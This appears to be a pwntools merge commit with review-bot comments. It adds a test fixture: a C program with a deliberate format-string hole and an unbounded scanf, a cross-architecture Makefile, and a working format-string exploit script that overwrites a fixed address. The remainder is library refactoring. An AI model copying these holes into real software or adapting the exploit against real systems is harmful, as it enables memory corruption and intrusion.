
Merge branch 'dev' into dev3

Arusekk committed Sep 24, 2019
2 parents 1566c90 + 2808b5c commit 8fdfd95df66cf1d11b74162f15e9eefdc1d8dc5b
@@ -0,0 +1,51 @@
CFLAGS := -Wno-unused-result -Wno-format-security
TARGETS := printf.mips printf.mips64 printf.mipsel printf.mips64el printf.arm printf.aarch64 \
printf.ppc printf.ppc64 printf.sparc64 printf.native printf.native32

.PHONY: run
run: all
./exploit.py

.PHONY: all
all: $(TARGETS)

.PHONY: clean
clean:
rm -f $(TARGETS)

# mips variants
%.mips: %.c
mips-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^
%.mipsel: %.c
mipsel-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^
%.mips64: %.c
mips64-linux-gnuabi64-gcc $(CFLAGS) -static -Os -o "$@" $^
%.mips64el: %.c
mips64el-linux-gnuabi64-gcc $(CFLAGS) -static -Os -o "$@" $^

# arm variants
%.arm: %.c
arm-linux-gnueabi-gcc $(CFLAGS) -static -Os -o "$@" $^
%.aarch64: %.c
aarch64-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^

# ppc variants
%.ppc: %.c
powerpc-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^
%.ppc64: %.c
powerpc64-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^

# sparc variants
%.sparc64: %.c
sparc64-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^

# native variants
%.native: %.c
gcc $(CFLAGS) -o "$@" $^
%.native32: %.c
i686-linux-gnu-gcc $(CFLAGS) -o "$@" $^

# install deps on ubuntu xenial
.PHONY: install-apt
install-apt:
apt-get install -y make gcc-mips64el-linux-gnuabi64 gcc-sparc64-linux-gnu gcc-powerpc64-linux-gnu gcc-powerpc-linux-gnu gcc-arm-linux-gnueabi gcc-aarch64-linux-gnu gcc-mips64-linux-gnuabi64 gcc-mipsel-linux-gnu gcc-mips64el-linux-gnuabi64 gcc-mips-linux-gnu gcc-i686-linux-gnu gcc
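Review bot: `gcc-mips64el-linux-gnuabi64` is listed twice in the `install-apt` recipe on the last line; the duplicate is harmless to apt but suggests the package list was assembled by hand and never checked against `TARGETS`. The reason for `-Wno-format-security` in `CFLAGS` is stated nowhere in the file; a comment such as `# printf.c passes user-supplied input as the format string on purpose (fmtstr test fixture), so the warning is silenced here` keeps the next reader from "fixing" it. The native targets also build without `-static -Os`, unlike every cross target; if that asymmetry is deliberate it deserves a word in the `# native variants` comment.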
@@ -0,0 +1,39 @@
#!/usr/bin/env python2
from pwn import *

@context.quiet
def exec_fmt(payload):
p = context.binary.process()
p.sendline(payload)
return p.recvall()

def exploit(binary):
context.binary = ELF(binary)
autofmt = FmtStr(exec_fmt)
offset = autofmt.offset
with context.binary.process() as p:
addr = unpack(p.recv(context.bytes))
payload = fmtstr_payload(offset, {addr: p32(0x1337babe)})
p.sendline(payload)
p.recvuntil("DONE")
print hex(u32(p.recv(4)))

binaries = [
"printf.mips",
"printf.mips64",
"printf.mipsel",
"printf.mips64el",
"printf.native",
"printf.native32",
"printf.ppc",
"printf.ppc64",
"printf.sparc64",
"printf.arm",
"printf.aarch64",
]

if len(sys.argv) > 1:
binaries = sys.argv[1:]

for binary in binaries:
exploit(binary)
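Review bot: `exploit` only prints the value read back after the write (`print hex(u32(p.recv(4)))`), so a wrong offset or a broken `fmtstr_payload` on one architecture yields a different number while `make run` still exits 0. Pinning the expected value, e.g. `assert u32(p.recv(4)) == 0x1337babe, binary`, turns the script into a real regression test; the expected value is the one written two lines above. The Python 2-only `print` statement is consistent with the `python2` shebang, but it will need `print(...)` once the rest of the tree moves to Python 3.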
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,29 @@
#ifdef _FORTIFY_SOURCE
#undef _FORTIFY_SOURCE
#endif
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#define MEMORY_ADDRESS ((void*)0x11110000)
#define MEMORY_SIZE 1024
#define TARGET ((int *) 0x11110100)
int main(int argc, char const *argv[])
{
char buff[1024];
void *ptr = NULL;
int *my_var = TARGET;
ptr = mmap(MEMORY_ADDRESS, MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
if(ptr != MEMORY_ADDRESS)
{
perror("mmap");
return EXIT_FAILURE;
}
*my_var = 0x41414141;
write(1, &my_var, sizeof(int *));
scanf("%s", buff);
dprintf(2, buff);
write(1, "DONE", 4);
write(1, my_var, sizeof(int));
return 0;
}
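Review bot: `scanf("%s", buff)` reads an unbounded string into a 1024-byte stack buffer, so the fixture carries a second, unintended bug next to the deliberate format-string sink on the following `dprintf` line; a field width, `scanf("%1023s", buff);`, keeps the test exercising only the format string. `mmap` is also called with fd `0` for an anonymous mapping; Linux ignores the descriptor, but the portable form is `-1`, i.e. `..., MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);`. A short header comment stating that this binary is intentionally vulnerable and only driven by exploit.py would help whoever finds it in the tree.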
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -52,7 +52,6 @@
import glob
import logging
import os
import platform
import re
import shutil
import six
@@ -416,7 +415,7 @@ def wait_for_device(kick=False):
@with_device
def disable_verity():
"""Disables dm-verity on the device."""
with log.waitfor("Disabling dm-verity on %s" % context.device) as w:
with log.waitfor("Disabling dm-verity on %s" % context.device):
root()

with AdbClient() as c:
@@ -434,7 +433,7 @@ def disable_verity():
@with_device
def remount():
"""Remounts the filesystem as writable."""
with log.waitfor("Remounting filesystem on %s" % context.device) as w:
with log.waitfor("Remounting filesystem on %s" % context.device):
disable_verity()
root()

@@ -856,7 +855,7 @@ def whoami():
def forward(port):
"""Sets up a port to forward to the device."""
tcp_port = 'tcp:%s' % port
start_forwarding = adb(['forward', tcp_port, tcp_port])
adb(['forward', tcp_port, tcp_port])
atexit.register(lambda: adb(['forward', '--remove', tcp_port]))

@context.quietfunc
@@ -1066,7 +1065,7 @@ def enable_uart(self):
'Nexus 7': 'oem uart-on',
}

with log.waitfor('Enabling kernel UART') as w:
with log.waitfor('Enabling kernel UART'):

if model not in known_commands:
log.error("Device UART is unsupported.")
@@ -47,9 +47,7 @@
import platform
import re
import shutil
import string
import subprocess
import sys
import tempfile
from collections import defaultdict
from glob import glob
@@ -161,7 +159,6 @@ def which_binutils(util):
Exception: Could not find 'as' installed for ContextType(arch = 'msp430')
"""
arch = context.arch
bits = context.bits

# Fix up pwntools vs Debian triplet naming, and account
# for 'thumb' being its own pwntools architecture.
@@ -411,8 +408,6 @@ def cpp(shellcode):
>>> cpp("SYS_setresuid", os = "freebsd")
'311\n'
"""
arch = context.arch
os = context.os
code = _include_header() + shellcode
cmd = [
'cpp',
@@ -758,7 +753,6 @@ def disasm(data, vma = 0, byte = True, offset = True, instructions = True):
result = ''

arch = context.arch
os = context.os

tmpdir = tempfile.mkdtemp(prefix = 'pwn-disasm-')
step1 = path.join(tmpdir, 'step1')
@@ -788,7 +782,7 @@ def disasm(data, vma = 0, byte = True, offset = True, instructions = True):
with open(step1, 'wb') as fd:
fd.write(data)

res = _run(objcopy + [step1, step2])
_run(objcopy + [step1, step2])

output0 = _run(objdump + [step2])
output1 = output0.split('<.text>:\n')
@@ -809,16 +803,17 @@ def disasm(data, vma = 0, byte = True, offset = True, instructions = True):
pattern = pattern[::2]
pattern = ''.join(pattern)
for line in result.splitlines():
try:
groups = re.search(pattern, line).groups()
if byte:
o, b, i = groups
else:
o, i = groups
except:
match = re.search(pattern, line)
if not match:
lines.append(line)
continue

groups = match.groups()
if byte:
o, b, i = groups
else:
o, i = groups

line = ''

if offset:
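Review bot: `re.search(pattern, line)` on the new `match = ...` line goes through the `re` module cache on every line of the objdump output, although `pattern` is fixed once `''.join(pattern)` has run a few lines above; `regex = re.compile(pattern)` before the `for` loop and `match = regex.search(line)` inside it is the usual shape. Replacing the bare `except:` with an explicit `if not match` check is the right move, since the old form also swallowed any `ValueError` from the `o, b, i = groups` unpacking. `disasm` begins and ends outside this hunk.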
@@ -267,10 +267,6 @@ def _longest(d):
"""
return collections.OrderedDict((k,d[k]) for k in sorted(d, key=len, reverse=True))

def TlsProperty(object):
def __get__(self, obj, objtype=None):
return obj._tls

class ContextType(object):
r"""
Class for specifying information about the target machine.
@@ -429,7 +425,7 @@ def __init__(self, **kwargs):
All keyword arguments are passed to :func:`update`.
"""
self._tls = _Tls_DictStack(_defaultdict(ContextType.defaults))
self._tls = _Tls_DictStack(_defaultdict(self.defaults))
self.update(**kwargs)


@@ -696,11 +692,11 @@ def arch(self, arch):
break

try:
defaults = ContextType.architectures[arch]
defaults = self.architectures[arch]
except KeyError:
raise AttributeError('AttributeError: arch must be one of %r' % sorted(ContextType.architectures))
raise AttributeError('AttributeError: arch must be one of %r' % sorted(self.architectures))

for k,v in ContextType.architectures[arch].items():
for k,v in defaults.items():
if k not in self._tls:
self._tls[k] = v

@@ -730,8 +726,8 @@ def kernel(self, arch):
Even then, this doesn't matter much -- only when the the segment
registers need to be known
"""
with context.local(arch=arch):
return context.arch
with self.local(arch=arch):
return self.arch

@_validator
def bits(self, bits):
@@ -874,10 +870,10 @@ def endian(self, endianness):
"""
endian = endianness.lower()

if endian not in ContextType.endiannesses:
raise AttributeError("endian must be one of %r" % sorted(ContextType.endiannesses))
if endian not in self.endiannesses:
raise AttributeError("endian must be one of %r" % sorted(self.endiannesses))

return ContextType.endiannesses[endian]
return self.endiannesses[endian]


@_validator
@@ -944,7 +940,6 @@ def log_file(self, value):
'...:DEBUG:...:Hello from bar!\n'
"""
if isinstance(value, (bytes, six.text_type)):
modes = ('w', 'wb', 'a', 'ab')
# check if mode was specified as "[value],[mode]"
if ',' not in value:
value += ',a'
@@ -1019,8 +1014,8 @@ def os(self, os):
"""
os = os.lower()

if os not in ContextType.oses:
raise AttributeError("os must be one of %r" % ContextType.oses)
if os not in self.oses:
raise AttributeError("os must be one of %r" % self.oses)

return os

@@ -1058,11 +1053,11 @@ def signed(self, signed):
...
AttributeError: signed must be one of ['no', 'signed', 'unsigned', 'yes'] or a non-string truthy value
"""
try: signed = ContextType.signednesses[signed]
try: signed = self.signednesses[signed]
except KeyError: pass

if isinstance(signed, str):
raise AttributeError('signed must be one of %r or a non-string truthy value' % sorted(ContextType.signednesses))
raise AttributeError('signed must be one of %r or a non-string truthy value' % sorted(self.signednesses))

return bool(signed)

@@ -1167,13 +1162,13 @@ def adb_port(self, value):
def device(self, device):
"""Sets the device being operated on.
"""
if isinstance(device, (bytes, six.text_type)):
device = Device(device)
if isinstance(device, Device):
self.arch = device.arch or self.arch
self.bits = device.bits or self.bits
self.endian = device.endian or self.endian
self.os = device.os or self.os
elif isinstance(device, (bytes, six.text_type)):
device = Device(device)
elif device is not None:
raise AttributeError("device must be either a Device object or a serial number as a string")
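Review bot: The two `isinstance(device, (bytes, six.text_type))` branches in this hunk are not equivalent and the rendered page does not show which one survives the merge: with the leading `if` form a serial string becomes a `Device` and then reaches the `arch`/`bits`/`endian`/`os` propagation below, whereas with the trailing `elif` form the string is converted but none of those attributes are copied. If the trailing `elif` is the one kept, `context.device = '<serial>'` silently stops adjusting the context; the leading `if` form is presumably the intended one. Either way a comment on the conversion, `# convert first so a serial string also takes the Device branch below`, documents the ordering constraint. The end of the setter lies outside the hunk.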

@@ -439,9 +439,15 @@ def debug(self, argv=[], *a, **kw):
return pwnlib.gdb.debug([self.path] + argv, *a, **kw)

def _describe(self, *a, **kw):
log.info_once('\n'.join((repr(self.path),
'%-10s%s-%s-%s' % ('Arch:', self.arch, self.bits, self.endian),
self.checksec(*a, **kw))))
log.info_once(
'%s\n%-10s%s-%s-%s\n%s',
repr(self.path),
'Arch:',
self.arch,
self.bits,
self.endian,
self.checksec(*a, **kw)
)

def __repr__(self):
return "ELF(%r)" % self.path
